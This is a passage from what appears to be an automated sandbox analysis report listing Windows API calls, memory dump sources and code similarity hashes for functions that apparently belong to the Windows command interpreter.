                                      • Part of subcall function 011E3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                      • Part of subcall function 011E3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                      • Part of subcall function 011E3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                      • Part of subcall function 011E3AAE: memcpy.MSVCRT ref: 011E3AE3
                                      • Part of subcall function 011E3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,011E3DBB), ref: 011EDFEA
                                    • RtlFreeHeap.NTDLL(00000000,?,011E3DBB), ref: 011EDFF1
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
                                    • String ID:
                                    • API String ID: 197374240-0
                                    • Opcode ID: 2a500798ed1c25210fb46c0878df980409aaa44a5b7c4517a16f5a05102885cc
                                    • Instruction ID: 4c487068d14a3d6b0647b84abe2f30d3305ad894d05d26a4459f6eacb17d4a89
                                    • Opcode Fuzzy Hash: 2a500798ed1c25210fb46c0878df980409aaa44a5b7c4517a16f5a05102885cc
                                    • Instruction Fuzzy Hash: 1BE09232A4461267EE3476F97C1DF862E949B94B39F114448FB85CA0C4DE20C4C08BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F98A3
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,011F3811,?,?,00000001,?), ref: 011F98AB
                                    • _get_osfhandle.MSVCRT ref: 011F98C1
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F3811,?,?,00000001,?), ref: 011F98C9
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID:
                                    • API String ID: 1606018815-0
                                    • Opcode ID: 7212170d9ac54259dcb61945c81d657af1683eb9892d0b80b239e2f5ca9b386f
                                    • Instruction ID: dad0fbfef5491f2ff70b8b154ce74b5d15a43aeff037ec27626b183b96b7690e
                                    • Opcode Fuzzy Hash: 7212170d9ac54259dcb61945c81d657af1683eb9892d0b80b239e2f5ca9b386f
                                    • Instruction Fuzzy Hash: 1BE01A72900609EBEF20DBA5E81EBAA7B6CEB00325F100956F915C61C1DE71DA809B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E4C19
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E4C21
                                    • _get_osfhandle.MSVCRT ref: 011E4C2F
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E4C37
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID:
                                    • API String ID: 1606018815-0
                                    • Opcode ID: 0d436f267e146aaec29645c3d4618b2b7733ab316f18fe81d7d4d5981318e2d6
                                    • Instruction ID: ec6dbe24701a0c3c265431f4d6d29991e6dcf2e7dd235b3d323c8d355a4eef70
                                    • Opcode Fuzzy Hash: 0d436f267e146aaec29645c3d4618b2b7733ab316f18fe81d7d4d5981318e2d6
                                    • Instruction Fuzzy Hash: 03E0BDB2A00201EFEF2ADBA0F81EB547BB5F718305B001A9AF1118318ADBB1A580DB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,011DACAB), ref: 011DACDE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACE5
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DACEE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACF5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                      • Part of subcall function 011DEEF0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DEF39
                                      • Part of subcall function 011DEEF0: RtlFreeHeap.NTDLL(00000000,?,011DE5F6), ref: 011DEF40
                                      • Part of subcall function 011DEEF0: _setjmp3.MSVCRT ref: 011DEFA5
                                    • _wcsupr.MSVCRT ref: 011F0A16
                                      • Part of subcall function 011E2ABE: memset.MSVCRT ref: 011E2B59
                                      • Part of subcall function 011E2ABE: ??_V@YAXPAX@Z.MSVCRT ref: 011E2C13
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                    • String ID: FOR$ IF
                                    • API String ID: 3818062306-2924197646
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • wcschr.MSVCRT ref: 011FB377
                                    • memcpy.MSVCRT ref: 011FB3F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$AllocProcessmemcpywcschr
                                    • String ID: &()[]{}^=;!%'+,`~
                                    • API String ID: 3241892172-381716982
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011DDE60
                                      • Part of subcall function 011DF300: _setjmp3.MSVCRT ref: 011DF318
                                      • Part of subcall function 011DF300: iswspace.MSVCRT ref: 011DF35B
                                      • Part of subcall function 011DF300: wcschr.MSVCRT ref: 011DF37D
                                      • Part of subcall function 011DF300: iswdigit.MSVCRT ref: 011DF3DE
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000), ref: 011EBCF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$AllocProcess_setjmp3_wcsicmpiswdigitiswspacelongjmpwcschr
                                    • String ID: REM/?
                                    • API String ID: 1631155197-4093888634
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,011FC120,0000001C,011F5CB1), ref: 011F4A58
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 011F4B28
                                      • Part of subcall function 011F587B: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58AF
                                      • Part of subcall function 011F587B: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0), ref: 011F58E5
                                      • Part of subcall function 011F587B: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: wcschr$Close$CreateOpenValueiswspace
                                    • String ID: Software\Classes
                                    • API String ID: 1047774138-1656466771
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,011FC0C0,0000001C,011F5CE1), ref: 011F51F4
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 011F52BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: wcschr$CloseOpeniswspace
                                    • String ID: Software\Classes
                                    • API String ID: 2439148603-1656466771
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,011E0B7F), ref: 011ECDDF
                                    • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 011ECE81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ConsoleTitle
                                    • String ID: -
                                    • API String ID: 3358957663-3695764949
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011F8459
                                    • printf.MSVCRT ref: 011F84B4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                    • String ID: %3d
                                    • API String ID: 2845598586-2138283368
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E72B5: __EH_prolog3_catch.LIBCMT ref: 011E7650
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                    • memset.MSVCRT ref: 011E0CDD
                                    Strings
                                    • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 011ECD51
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: H_prolog3_catchmemset
                                    • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                    • API String ID: 620422817-3416068913
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03AFFDFA
                                    Strings
                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03AFFE2B
                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03AFFE01
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                    • API String ID: 885266447-3903918235
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: iswspacewcschr
                                    • String ID: =,;
                                    • API String ID: 287713880-1539845467
                                    Uniqueness

                                    Uniqueness Score: -1.00%